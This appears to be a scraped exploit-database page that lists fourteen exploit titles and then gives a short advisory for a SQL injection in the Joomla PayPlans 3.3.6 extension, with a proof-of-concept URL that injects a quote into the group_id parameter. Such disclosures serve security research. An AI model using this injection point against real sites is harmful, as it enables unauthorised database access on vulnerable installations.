
14 new exploits FRticket Ticket System - Stored XSS Viart Shopping Cart 5.0 - CSRF Shell Upload Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Dream Gallery 2.0 - Admin Panel Authentication Bypass Grid Gallery 1.0 - Admin Panel Authentication Bypass Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC iSQL 1.0 - Shell Command Injection iSQL 1.0 - isql_main.c Buffer Overflow PoC Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
25 lines
No EOL
702 B
Text
Executable file
25 lines
No EOL
702 B
Text
Executable file
######################
|
|
# Exploit Title : Joomla com_payplans - SQL Injection
|
|
# Exploit Author : Persian Hack Team
|
|
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
|
|
# Category: [ Webapps ]
|
|
# Tested on: [ Win ]
|
|
# Version: 3.3.6
|
|
# Date: 2016/06/08
|
|
######################
|
|
#
|
|
# PoC:
|
|
|
|
# group_id Parameter Vulnerable To SQL
|
|
|
|
# Demo :
|
|
|
|
# http://server/index.php?option=com_payplans&group_id=4%27
|
|
|
|
# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
|
|
|
|
######################
|
|
# Discovered by : Mojtaba MobhaM
|
|
# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
|
|
# Homepage : persian-team.ir
|
|
###################### |